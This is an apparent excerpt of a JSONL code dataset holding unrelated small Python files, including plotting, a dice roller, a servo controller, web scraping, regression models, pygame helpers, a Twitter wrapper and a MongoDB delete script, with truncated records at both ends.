context)\n","sub_path":"redditorama/apps/gallery/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"645704070","text":"import matplotlib.pyplot as plt\n\nfrom simulation import Scheme\n\n\ndef export(simulations, file_path, marker_styles=None):\n xticks = []\n\n for scheme, simulations2 in simulations.items():\n xs = []\n ys = []\n\n for num_stations, simulation in simulations2.items():\n if num_stations not in xticks and num_stations % 10 == 0:\n xticks.append(num_stations)\n\n xs.append(num_stations)\n ys.append(simulation.successful_transmissions)\n\n if marker_styles is None:\n plt.plot(xs, ys, 'o-', label=Scheme.to_human_name(scheme))\n else:\n plt.plot(xs, ys, label=Scheme.to_human_name(scheme), **marker_styles[scheme])\n\n plt.grid()\n plt.xlabel('Number of Stations')\n plt.ylabel('Number of Successful Transmissions')\n plt.xticks(xticks)\n plt.legend(fancybox=True, framealpha=1.0)\n plt.savefig(file_path, bbox_inches='tight')\n plt.clf()\n","sub_path":"exporters/stations_transmissions_plot.py","file_name":"stations_transmissions_plot.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"583912119","text":"\nfrom random import randint\nprint (\"Welcome to this dice roling simulator\")\n\ndef rollAndPrint(min, max) :\n die = randint(min, max)\n print (\"You rolled a \",die,\" !\\n\")\n\nminimum = int(input(\"Input the minimum number of your die (usualy 1) \"))\nmaximum = int(input(\"Input the maximum number of your die (usualy 6) \"))\nnum = int(input(\"How many dice do you want to roll ? \"))\nif (minimum < 0) or (maximum < 0) or (num <= 0) :\n print(\"reeeeeee\")\n raise ValueError('A very specific bad thing happened')\n\nfor i in range (0, num):\n rollAndPrint(minimum, maximum)\n\nprint (\"Thank you for using this shit program!\")\n","sub_path":"dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"82620674","text":"import RPi.GPIO as GPIO\nimport time\nimport sys\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\nGPIO.setup(16,GPIO.OUT)\n\npwmOne = GPIO.PWM(16, 100)\npwmOne.start(0)\ni = 0\nwhile(i == 0 ):\n duty1 = float(sys.argv[1]) / 10.0 + 2.5\n pwmOne.ChangeDutyCycle(duty1)\n time.sleep(0.4)\n break\nquit()\n\n","sub_path":"servo_controller/servoCMD4.py","file_name":"servoCMD4.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"452344790","text":"#!/usr/bin/python2.7\n# coding=utf-8\n\"\"\"\nCreated on 2015-4-27\n\n@author: Jay\n\"\"\"\nimport site\nimport os\nsite.addsitedir(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\nsite.addsitedir(os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))), \"common_server\"))\nfrom gevent import monkey\nmonkey.patch_all()\n\nfrom utils.service_control.controller import MainService\nfrom mxadap import setting\n\n\n\nclass Service(MainService):\n \"\"\"\n 主服务\n \"\"\"\n def __init__(self):\n super(Service, self).__init__(setting.SERVICE_TYPE, setting.VERSION)\n\n def init(self, args):\n \"\"\"\n 初始化接口\n :param args: 参数变量\n :return:\n \"\"\"\n from utils.openfire.user_service import UserService\n UserService(args.openfire_ip, args.openfire_port)\n\n # init xmpp client to 
openfire server\n        from mxadap.apps.mqtt_app import MQTT_APP\n        MQTT_APP().init(args.mqtt_ip, args.mqtt_port)\n\n    def services(self, args, thread_ls):\n        \"\"\"\n        Interface for adding services\n        :param args: parameter variables\n        :param thread_ls: the existing list of services\n        :return:\n        \"\"\"\n        from mxadap.apps.mqtt_app import MQTT_APP\n        thread_ls.append(MQTT_APP())\n\n    def add_cmd_opts(self, arg_parser):\n        \"\"\"\n        Hook for adding arg_parser arguments before the sm arguments are parsed\n        :param arg_parser: the argument parser\n        :return:\n        \"\"\"\n        from utils.service_control.parser import parser_boolean\n        arg_parser.add_argument('--xxtea_key', default='A~3c1(@8$B65Wb<9', type=str, help=\"The key of XXTEA cryptor\")\n        arg_parser.add_argument('--use_xxtea', default=False, type=parser_boolean, help=\"Whether to use the xxtea crypto\")\n        arg_parser.add_argument('--use_sign', default=False, type=parser_boolean, help=\"whether to use the service sign\")\n        arg_parser.add_argument('--mxadap_etime', default=60, type=int, help=\"The time to expire the mqtt adapter connection\")\n\n        arg_parser.add_argument('--mqtt_ip', type=str, help=\"The ip of the mqtt server\")\n        arg_parser.add_argument('--mqtt_port', type=int, help=\"The port of the mqtt server\")\n\n        arg_parser.add_argument('--openfire_ip', type=str, help=\"The host of the openfire\")\n        arg_parser.add_argument('--openfire_port', type=int, help=\"The port used for unsecured admin console access\")\n\n\nif __name__ == \"__main__\":\n    import sys\n    reload(sys)\n    sys.setdefaultencoding('utf8')\n    Service().start_service()\n","sub_path":"server/workspace/mxadap/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} {"seq_id":"508144970","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\n\nurl = 'http://www.footballlocks.com/nfl_point_spreads.shtml'\n\ndef get_spreads(url):\n    games = {}\n\n    f,u,s, = 5,7,6\n\n    i = 1\n\n    response = requests.get(url)\n    soup = BeautifulSoup(response.text, 'lxml')\n    \n    tables = soup.find('table', {'cols' : '4'})\n    \n    spreads = tables.find_all('td')\n    \n    for td in range(len(spreads)):\n        try:\n            favorite = spreads[f].text\n            underdog = spreads[u].text\n            spread = spreads[s].text\n            out_msg = (f'Game: {i}, Favorite: {favorite.upper()}, Underdog: {underdog.upper()}, Spread: {spread}')\n            out_msg = re.sub('AT ', '', out_msg)\n            print(out_msg)\n            print()\n            f,u,s,i = f+4, u+4, s+4, i+1\n        except:\n            pass\n\n\nif __name__ == \"__main__\":\n    get_spreads(url)\n","sub_path":"nfl_spreads.py","file_name":"nfl_spreads.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} {"seq_id":"1296017","text":"# _*_ coding:utf-8 _*_\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn.ensemble import GradientBoostingRegressor\n\nimport pandas as pd\n\n# read dataset\ndata = pd.read_excel('./RealEstateValuationDataSet.xlsx',index_col=0)\nprint(data.info())\n\n# preprocess dataset\ndata['X1 transaction date'] = data['X1 transaction date'] - 2012\ndata['X3 distance to the nearest MRT station'] = data['X3 distance to the nearest MRT station'] / 1000\nY = data['Y house price of unit area']\nX = data.drop(columns=['Y house price of unit area'])\nx = X.values\ny = Y.values\n\nprint('##################################################################') \n# random split\ntrain_x, test_x, train_y, test_y = train_test_split(x, y, train_size=0.8, random_state=33)\n\n#standardize the data\nss_x = 
preprocessing.StandardScaler()\ntrain_x = ss_x.fit_transform(train_x)\ntest_x = ss_x.transform(test_x)\n \nss_y = preprocessing.StandardScaler()\ntrain_y = ss_y.fit_transform(train_y.reshape(-1, 1))\ntest_y = ss_y.transform(test_y.reshape(-1, 1))\n\n# 多层感知器-回归模型 参数选择 3,26,28\n'''\nprint('###############################参数网格优选###################################')\ndef genrator():\n for i in range(3,10):\n for j in range(3,30):\n for k in range(3,30):\n yield (i,j,k)\nbest_score = 0\nbest_list = []\nnum = 0\nfor i,j,k in genrator():\n model_mlp = MLPRegressor(hidden_layer_sizes=(i,j,k), activation='relu', solver='adam', alpha=0.0001, batch_size='auto',\n learning_rate='constant', learning_rate_init=0.001, power_t=0.5, max_iter=200, shuffle=True,\n random_state=1, tol=0.0001, verbose=False, warm_start=False, momentum=0.9, nesterovs_momentum=True,\n early_stopping=False,beta_1=0.9, beta_2=0.999, epsilon=1e-08)\n model_mlp.fit(train_x,train_y.ravel())\n mlp_score=model_mlp.score(test_x,test_y.ravel())\n num = num+1\n if num%30 == 0:\n print('num:',num,i,j,k)\n if mlp_score>70.0:\n print('sklearn MLP',mlp_score)\n print(i,j,k)\n if mlp_score > best_score:\n best_list = [i,j,k]\n print('new_score',mlp_score,'and list',best_list)\n best_score = mlp_score\nprint('best_list',best_list)\n'''\n\n# 集成-回归模型 参数选择\n'''\nmodel_gbr=GradientBoostingRegressor()\nmodel_gbr.fit(train_x,train_y.ravel())\ngbr_score_disorder=model_gbr.score(test_x,test_y.ravel())\nprint('sklearn ensemble',gbr_score_disorder)\nprint('###############################参数网格优选###################################')\nmodel_gbr_GridSearch=GradientBoostingRegressor()\n#设置参数池 参考 http://www.cnblogs.com/DjangoBlog/p/6201663.html\nparam_grid = {'n_estimators':range(20,81,10),\n 'learning_rate': [0.2,0.1, 0.05, 0.02, 0.01 ],\n 'max_depth': [4, 6,8],\n 'min_samples_leaf': [3, 5, 9, 14],\n 'max_features': [0.8,0.5,0.3, 0.1]}\n#网格调参\nfrom sklearn.model_selection import GridSearchCV\nestimator = GridSearchCV(model_gbr_GridSearch,param_grid )\nestimator.fit(train_x,train_y.ravel() )\nprint('最优调参:',estimator.best_params_)\n# {'learning_rate': 0.1, 'max_depth': 4, 'max_features': 0.5, 'min_samples_leaf': 14, 'n_estimators': 30}\nprint('调参后得分',estimator.score(test_x, test_y.ravel()))\n'''\n\nmodel_mlp_best = MLPRegressor(hidden_layer_sizes=(3,26,28), activation='relu', solver='adam', alpha=0.0001, batch_size='auto',\n learning_rate='constant', learning_rate_init=0.001, power_t=0.5, max_iter=200, shuffle=True,\n random_state=1, tol=0.0001, verbose=False, warm_start=False, momentum=0.9, nesterovs_momentum=True,\n early_stopping=False,beta_1=0.9, beta_2=0.999, epsilon=1e-08)\nmodel_mlp_best.fit(train_x,train_y.ravel())\nmlp_score=model_mlp_best.score(test_x,test_y.ravel())\nprint('sklearn MLP',mlp_score) #准确率 0.713\n\nmodel_gbr_best=GradientBoostingRegressor(learning_rate=0.1,max_depth=4,max_features=0.5,min_samples_leaf=14,n_estimators=30)\nmodel_gbr_best.fit(train_x,train_y.ravel() )\ngbr_score=model_gbr_best.score(test_x,test_y.ravel())\nprint('sklearn ensemble',gbr_score)#准确率 0.702\n\n#使用最好的集成模型进行预测\ngbr_pridict=model_gbr_best.predict(test_x)\n#多层感知器\nmlp_pridict=model_mlp_best.predict(test_x)\n \n#画图\nimport matplotlib.pyplot as plt\nfig = plt.figure(figsize=(10, 5))\naxes = fig.add_subplot(1, 1, 1)\nline3,=axes.plot(range(len(test_y)), test_y, 'g',label='GroundTruth')\nline1,=axes.plot(range(len(gbr_pridict)), gbr_pridict, 'b--',label='Ensemble',linewidth=2)\nline2,=axes.plot(range(len(mlp_pridict)), mlp_pridict, 
'r--',label='MLP',linewidth=2)\naxes.grid()\nfig.tight_layout()\nplt.legend(handles=[line1, line2, line3])\nplt.title(\"sklearn Regression\")\nplt.show()\n#print(ss_y.inverse_transform(mlp_pridict))\n","sub_path":"HW6/sk.py","file_name":"sk.py","file_ext":"py","file_size_in_byte":4812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"88054909","text":"import sys\r\nimport math\r\nimport time \r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom gui import Ui_Form\r\n\r\ndef Factor(n):\r\n Ans = []\r\n d = 2\r\n while d * d <= n:\r\n if n % d == 0:\r\n Ans.append(d)\r\n n //= d\r\n else:\r\n d += 1\r\n if n > 1:\r\n Ans.append(n) \r\n return Ans \r\n\r\ndef main():\r\n #Create application\r\n app = QtWidgets.QApplication(sys.argv)\r\n\r\n #Create Form and UI\r\n Form = QtWidgets.QWidget()\r\n ui = Ui_Form()\r\n ui.setupUi(Form)\r\n Form.show()\r\n\r\n #Hook logic\r\n def bp():\r\n start_time = time.time()\r\n try :\r\n ui.label_7.setText(\"\") \r\n x=ui.lineEdit.text()\r\n n=Factor(int(x)) \r\n ui.textEdit.setText(str(n))\r\n ui.label_6.setText(str(time.time() - start_time))\r\n except :\r\n ui.label_7.setText(\"Дані введено не коректно\") \r\n\r\n \r\n \r\n\r\n ui.pushButton.clicked.connect( bp )\r\n \r\n\r\n\r\n #Run main loop\r\n sys.exit(app.exec_())\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n \r\n\r\n\r\n","sub_path":"ferma/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"533602168","text":"import sys\nfrom time import sleep\nfrom bullet import Bullet\nimport pygame\n\ndef check_keydown_events(event, ai_settings, screen, stats, ship, bullets):\n \"\"\"Respond to keypress.\"\"\"\n if event.key == pygame.K_UP:\n ship.moving_up = True\n elif event.key == pygame.K_DOWN:\n ship.moving_down = True\n elif event.key == pygame.K_SPACE:\n fire_bullet(ai_settings, screen, ship, bullets)\n elif event.key == pygame.K_q:\n sys.exit()\n elif event.key == pygame.K_p:\n play_game(stats)\n\ndef check_keyup_events(event, ship):\n \"\"\"Respond to key releases.\"\"\"\n if event.key == pygame.K_UP:\n ship.moving_up = False\n elif event.key == pygame.K_DOWN:\n ship.moving_down = False\n\ndef check_events(ai_settings, screen, stats, play_button, ship,\n bullets):\n \"\"\"Respond to keypress and mouse events.\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n check_keydown_events(event, ai_settings, screen, stats, ship, bullets)\n elif event.type == pygame.KEYUP:\n check_keyup_events(event, ship)\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n mouse_x, mouse_y = pygame.mouse.get_pos()\n check_play_button(ai_settings, screen, stats, play_button,\n ship, bullets, mouse_x, mouse_y)\n\ndef play_game(stats):\n \"\"\"Start a new game \"\"\"\n if not stats.game_active:\n pygame.mouse.set_visible(False)\n stats.reset_stats()\n stats.game_active = True\n\ndef check_play_button(ai_settings, screen, stats, play_button, ship,\n bullets, mouse_x, mouse_y):\n \"\"\"Start a new game when the player clicks Play.\"\"\"\n button_clicked = play_button.rect.collidepoint(mouse_x, mouse_y)\n if button_clicked and not stats.game_active:\n ai_settings.initialize_dynamic_settings()\n pygame.mouse.set_visible(False)\n if play_button.rect.collidepoint(mouse_x, mouse_y):\n stats.reset_stats()\n stats.game_active = True\n\n # Empty the list of bullets.\n 
bullets.empty()\n\n # Center the ship\n ship.center_ship()\n\ndef update_screen(ai_settings, screen, stats, ship, bullets,\n play_button, target):\n \"\"\"Update images on the screen and flip to the new screen.\"\"\"\n # Redraw the screen during each pass through the loop.\n screen.fill(ai_settings.bg_color)\n\n # Redraw all bullets behind ship.\n for bullet in bullets.sprites():\n bullet.draw_bullet()\n\n ship.blitme()\n\n # Draw the play button if the game is inactive.\n if not stats.game_active:\n play_button.draw_button()\n\n # Draw the target\n target.draw_target()\n\n # Make the most recently drawn screen visible.\n pygame.display.flip()\n\ndef update_bullets(ai_settings, stats, screen, ship, target, bullets):\n \"\"\"Update position of bullets and get rid of old bullets.\"\"\"\n # Update bullet positions.\n bullets.update()\n\n # Get rif of bullets that have disappeared.\n for bullet in bullets.copy():\n if bullet.rect.left >= bullet.screen_rect.right:\n bullets.remove(bullet)\n if stats.ships_left > 0:\n stats.ships_left -= 1\n else:\n stats.game_active = False\n pygame.mouse.set_visible(True)\n\n check_bullet_target_collisions(ai_settings, screen, ship, target, bullets)\n\n\ndef check_bullet_target_collisions(ai_settings, screen, ship, target, bullets):\n # Respond to bullet-target collisions.\n bullet = pygame.sprite.spritecollideany(target, bullets)\n if bullet:\n # Destroy existing bullet.\n bullets.remove(bullet)\n ai_settings.increase_speed()\n\ndef fire_bullet(ai_settings, screen, ship, bullets):\n \"\"\"Fire a bullet if limit not reached yet.\"\"\"\n # Create a new bullet and add it to the bullets group.\n if len(bullets) < ai_settings.bullets_allowed:\n new_bullet = Bullet(ai_settings, screen, ship)\n bullets.add(new_bullet)\n\ndef update_target(ai_settings, stats, screen, ship, target, bullets):\n \"\"\"Check if the target is at an edge and then update its positions.\"\"\"\n if target.check_edges():\n ai_settings.target_direction *= -1\n target.update()\n","sub_path":"alien/exercises/Target/game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"520027006","text":"#!/usr/bin/env python\n\n##################################################\n## Universidade Federal da Bahia\n## 2018.2 - MATE21\n##################################################\n## GPLv3\n##################################################\n## Author: Adeilson Silva\n## Mmaintainer: github.com/adeilsonsilva\n## Email: adeilson@protonmail.com\n##################################################\n\nimport cv2\nimport json\nimport numpy as np\nimport os\nimport random\n\n# https://gluon.mxnet.io/chapter02_supervised-learning/softmax-regression-scratch.html\nN_CLASS = 10\n\n# Max number of epochs to run\nMAX_EPOCHS = 50\n\n# Image dimensions\nIMG_WIDTH = 71\nIMG_HEIGHT = 77\nNUM_CHANNELS = 1\n\n# There are 5000 training images\nDATA_SIZE = 5000\n\n# Learning rate\nL_RATE = 1e-1\n\n# Stop training if loss variates less than this\nMAX_DLOSS = 1e-7\nMIN_STD = 1e-3\n\n# Batch gradient descent parameter\n# https://towardsdatascience.com/gradient-descent-algorithm-and-its-variants-10f652806a3\nBATCH_SIZE = 64\n\ndef save_model(model, model_path):\n json_result = json.dumps(model)\n f = open(model_path,\"w\")\n f.write(json_result)\n f.close()\n\ndef load_model(model_path):\n f = open(model_path,\"r\")\n json_result = json.loads(''.join(f.readlines()))\n f.close()\n return 
json_result\n\n# Generate a random number and apply the change\ndef augmentate(image):\n\n # Rotates by an angle of [1, 10]\n if (random.random() >= 0.5):\n angle = random.randint(1, 10)\n image_center = tuple(np.array(image.shape[1::-1]) / 2)\n rot_mat = cv2.getRotationMatrix2D(image_center, angle, 1.0)\n image = cv2.warpAffine(image, rot_mat, image.shape[1::-1], flags=cv2.INTER_LINEAR)\n\n # Translates by [1, 10] pixels\n if (random.random() >= 0.5):\n tx = random.randint(1, 10)\n ty = random.randint(1, 10)\n transl_mat = np.float32([ [1, 0, tx], [0, 1, ty] ])\n image = cv2.warpAffine(image, transl_mat, image.shape[1::-1], flags=cv2.INTER_LINEAR)\n\n # Flips horizontally\n # if (random.random() >= 0.5):\n # cv2.flip(image, 1, image)\n\n # Gaussian noise\n # if (random.random() >= 0.5):\n # noise = image.copy()\n # cv2.randn(noise, (0), (150))\n # image += noise\n\n # Uniform noise\n if (random.random() >= 0.5):\n noise = image.copy()\n cv2.randu(noise, (0), (5))\n image += noise\n\n # print(image.shape)\n # cv2.imshow('teste', image)\n # cv2.waitKey(5000)\n return image\n\n# This function receives a list of image paths, loads them with OpenCV\n# and return an array with images and their labels\ndef load_batch(batch, as_vector=False, augmentation=False):\n images = []\n labels = []\n for tuple in batch:\n image_path = tuple[0]\n label = tuple[1]\n image = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)\n if augmentation:\n # Stochastic augmentation\n image = augmentate(image)\n if as_vector:\n # Reshapes image to a 1D vector and normalizes all pixels to [0, 1]\n image = image.reshape(IMG_WIDTH*IMG_HEIGHT*NUM_CHANNELS) / 255.0\n else:\n image = image.reshape(IMG_HEIGHT, IMG_WIDTH, NUM_CHANNELS) / 255.0\n images.append(image)\n labels.append(label)\n return np.array(images), np.array(labels)\n\ndef load_training_images(path, validation_percentage, as_vector = True, return_paths = False):\n # Load all file paths\n\n # Get class labels for training\n # Filters out blank values, removes \"\\n\", splits by \"/\" and get last position of strip.\n class_names = [ list(filter(None, i.rstrip().rsplit(\"/\")))[-1] for i in os.popen(\"ls -1d {}/train/*/\".format(path)).readlines() ]\n\n # 3D Arrays -> each position is an array with an image (which is an array) and a label\n # training_images[i][0] -> image\n # training_images[i][1] -> label\n training_images = []\n validation_images = []\n\n # Get images for each class and split into training and validation\n images_counter = 0\n for idx in range(0, len(class_names)):\n # Get all\n class_images = [ i.rstrip() for i in os.popen(\"ls {}train/{}/* | sort -V\".format(path, class_names[idx])).readlines() ]\n # Shuffle list to get different images each time\n random.shuffle(class_images)\n class_images_len = len(class_images)\n images_counter += class_images_len\n\n # Split into training and validation based on idx\n validation_idx = int(np.floor(class_images_len * validation_percentage))\n\n # Get splits paths\n training_paths = class_images[:class_images_len - validation_idx]\n validation_paths = class_images[class_images_len - validation_idx:]\n\n # Load training images\n for image_path in training_paths:\n if return_paths:\n image = image_path\n else:\n image = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)\n if as_vector:\n # Reshapes image to a 1D vector and normalizes all pixels to [0, 1]\n image = image.reshape(IMG_WIDTH*IMG_HEIGHT*NUM_CHANNELS) / 255.0\n else:\n image = image.reshape(IMG_HEIGHT, IMG_WIDTH, NUM_CHANNELS) / 255.0\n 
training_images.append([ image, idx ])\n\n # Load validation images\n for image_path in validation_paths:\n if return_paths:\n image = image_path\n else:\n image = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)\n if as_vector:\n # Reshapes image to a 1D vector and normalizes all pixels to [0, 1]\n image = image.reshape(IMG_WIDTH*IMG_HEIGHT*NUM_CHANNELS) / 255.0\n else:\n image = image.reshape(IMG_HEIGHT, IMG_WIDTH, NUM_CHANNELS) / 255.0\n validation_images.append([ image, idx ])\n\n return np.array(training_images), np.array(validation_images)\n","sub_path":"trab04/common_data.py","file_name":"common_data.py","file_ext":"py","file_size_in_byte":5920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"376005641","text":"import matplotlib\nmatplotlib.use('agg')\nfrom matplotlib import pyplot as plt # 2d plots\nfrom mpl_toolkits.mplot3d import Axes3D # 3dplots\nimport numpy as np # matrices and numerical methods\n\ndata = np.loadtxt('ex1data2.txt', delimiter=',')\nX = np.c_[data[:,0:2]]\ny = np.c_[data[:,2]]\n\n# this is a vectorized implementation, also works for multivarite\ndef computeCost(X, y, theta):\n m = X.shape[0] # number of examples\n\n predictions = X.dot(theta)\n errors = predictions - y\n sq_errors = np.square(errors)\n sum_of_sq_errors = np.sum(sq_errors)\n\n return (1/(2*m)) * sum_of_sq_errors\n\n# note: we return the mean and standard deviation so we can normalize\n# new test data we want to predict.\ndef normalizeFeatures(X):\n mu = np.mean(X, axis=0)\n sigma = np.std(X, axis=0)\n\n X_norm = X - mu\n X_norm = X_norm / sigma\n\n return (X_norm, mu, sigma)\n\nX, mu, sigma = normalizeFeatures(X)\nX = np.insert(X, 0, 1, axis=1) # add intercept term\n\ntheta = [[0],[0], [0]] # the parameters for our hypothesis\nalpha = 0.05 # our learning rate for gradient descent\niterations = 1500 # how many iterations we're running gradient descent\n\n# this is a vectorized implementation, also works for multivariate\ndef gradientDescent(X, y, theta, alpha, iterations):\n m = np.size(X, 0)\n J_hist = np.zeros(iterations)\n\n for i in np.arange(iterations):\n predictions = X.dot(theta)\n errors = predictions - y\n\n par_deriv = (1/m) * (X.T.dot(errors))\n theta = theta - alpha * par_deriv\n\n J_hist[i] = computeCost(X, y, theta)\n\n return (theta, J_hist)\n\ntheta, cost = gradientDescent(X, y, theta, alpha, iterations)\nprint('theta: ', theta.ravel())\n\nplt.plot(cost)\nplt.xlim(0, 80)\nplt.ylabel('Cost')\nplt.xlabel('Iterations');\nplt.savefig('01_gradient_descent_cost.png')\nplt.close()\n\n# when we add a new data point we want to predict, we need to\n# normalize it first, before adding the intercept term\nnew_data = [1650, 3]\nnew_data = new_data - mu\nnew_data = new_data / sigma\n\n# add intercept term\nnew_data = np.insert(new_data, 0, 1)\n\nprice = theta.T.dot(new_data)\n\nprint('Predicted price of a 1650 sq-ft, 3 br. 
house (using gradient descent): $%f' % price);\n","sub_path":"coursera-ml/python/01-linear-regression/multivariate/01-linear-regression-multivariate.py","file_name":"01-linear-regression-multivariate.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} {"seq_id":"565188248","text":"# ez_tweet.py - by baldnate\n#\n# When you just want to update twitter status and nothing else, ez_tweet is there.\n\nfrom twython import Twython, TwythonError, TwythonAuthError, TwythonStreamError, TwythonRateLimitError\n\n\nclass EZTweet(object):\n\n    \"\"\"docstring for EZTweet\"\"\"\n\n    def __init__(self, appkey, appsecret, oauthtoken, oauthtokensecret):\n        super(EZTweet, self).__init__()\n        self.twitter = Twython(appkey, appsecret, oauthtoken, oauthtokensecret)\n        self.lastTweet = \"\"\n\n    def __what_to_do__(self, e):\n        \"\"\"\n        Internal function for figuring out what to do with a Twython exception\n        \"\"\"\n        if isinstance(e, TwythonAuthError):\n            raise e\n        elif isinstance(e, TwythonStreamError):\n            raise e\n        elif isinstance(e, TwythonRateLimitError):\n            return e.retry_after\n        elif e.error_code in [502, 503, 504]:\n            return 1 * 60\n        elif e.error_code in [403]:\n            return 5 * 60\n        else:\n            raise e\n\n    def tweet(self, status):\n        \"\"\"\n        Returns number of seconds to wait until next tweet.\n        Raises if a non-retryable offense occurs.\n        \"\"\"\n        retVal = -1\n        if status == self.lastTweet:\n            # Errors get returned for posting the same status\n            # in succession. Don't tweet, and request tweet\n            # retry back-off of 60 seconds.\n            return 60\n        try:\n            self.twitter.update_status(status=status)\n        except TwythonError as e:\n            retVal = self.__what_to_do__(e)\n        self.lastTweet = status\n        return retVal\n\nif __name__ == \"__main__\":\n    import doctest\n    doctest.testmod()\n","sub_path":"host/ez_tweet.py","file_name":"ez_tweet.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} {"seq_id":"537247633","text":"\"\"\"Script test runner.\"\"\"\nimport logging\nimport sys\nimport subprocess\nfrom subprocess import CalledProcessError\nfrom typing import Dict, Any  # pylint: disable=unused-import\n\nfrom runway.tests.handlers.base import TestHandler\n\nTYPE_NAME = 'script'\nLOGGER = logging.getLogger('runway')\n\n\nclass ScriptHandler(TestHandler):\n    \"\"\"Handle script tests.\n\n    Args:\n        commands (List[str]): A list of commands to be executed in order.\n            Each command is run in its own subprocess. 
The working directory\n will be the same as where the 'runway test' command was executed.\n\n Example:\n tests:\n - name: example-test\n type: script\n args:\n commands:\n - echo \"this is an example\"\n - pwd\n\n \"\"\"\n\n @classmethod\n def handle(cls, name, args):\n # type: (str, Dict[str, Any]) -> None\n \"\"\"Perform the actual test.\"\"\"\n for cmd in args['commands']:\n try:\n exit_code = subprocess.call(cmd, shell=True)\n if exit_code != 0:\n raise ValueError(exit_code)\n except CalledProcessError as err:\n LOGGER.error('%s: failed to execute command: %s',\n name, cmd)\n raise err\n except ValueError:\n LOGGER.error('%s: failed command: %s', name, cmd)\n sys.exit(1)\n","sub_path":"runway/tests/handlers/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"410683020","text":"import sys\nimport pymongo\n\nconnection = pymongo.MongoClient(\"mongodb://localhost\")\n\ndb = connection.python\n\nsample = db.sample\n\ndoc = {'col01': 1, 'col02': 1,'col03':1}\n\nrow = db.sample.delete_many({\"col01\" : 2})\n# db.people.updateMany({age:{$gt:25}},{$set:{status:\"C\"}})\n\nrows = db.sample.find()\n\nfor r in rows :\n print(r)","sub_path":"HELLOPYTHON/day10/mongo_delete.py","file_name":"mongo_delete.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"482711723","text":"# Author: Brian Hoang\n# Date: 10/23/2019\n# Description: function that returns # of steps to reach 1 in hailstone sequence when starting at n\n\ndef hailstone(n):\n #count variable is increased everytime loop is ran\n count=0\n #runs loop until n=1\n while n!=1:\n #if number is even, divide by 2\n if(n%2) == 0:\n n=n/2\n count+=1\n #if number is odd, multiply by 3 and add 1\n else:\n n=n*3+1\n count+=1\n #return number it takes to get to 1\n return count\nprint(int(hailstone(3)))\n\n","sub_path":"hailstone.py","file_name":"hailstone.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"385637400","text":"from flask import session\nfrom datetime import datetime\nfrom models.user import User\n\ndef prep_landing():\n user = User.query.get(session['user_id'])\n tweets = []\n u_f = user.users_this_user_is_following\n for u in u_f:\n tweets.extend(u.user_tweets)\n tweets.extend(user.user_tweets)\n liked_tweets = user.tweets_this_user_likes\n return user, tweets, liked_tweets\n\ndef tweet_time(tweets):\n for tweet in tweets:\n td = datetime.utcnow() - tweet.created_at\n if td.seconds == 0:\n tweet.time_since_secs = 1\n if td.seconds < 60 and td.seconds > 0:\n tweet.time_since_secs = td.seconds\n if td.seconds < 3600:\n tweet.time_since_minutes = round(td.seconds / 60) % 60\n if td.seconds > 3600:\n tweet.time_since_hours = round(td.seconds / 3600)\n if td.days > 0:\n tweet.time_since_days = td.days\n\n return tweets\n\ndef tweet_like_count(tweets):\n for tweet in tweets:\n tweet.like_count = len(tweet.users_who_like_this_tweet)\n \n return tweets","sub_path":"modularization/dojo_tweets_mod/landing_utils.py","file_name":"landing_utils.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"307491679","text":"# Tech Notebook\n# youtube.com/technotebook\nimport time\nimport os\nimport usb_hid\nfrom adafruit_hid.keycode import 
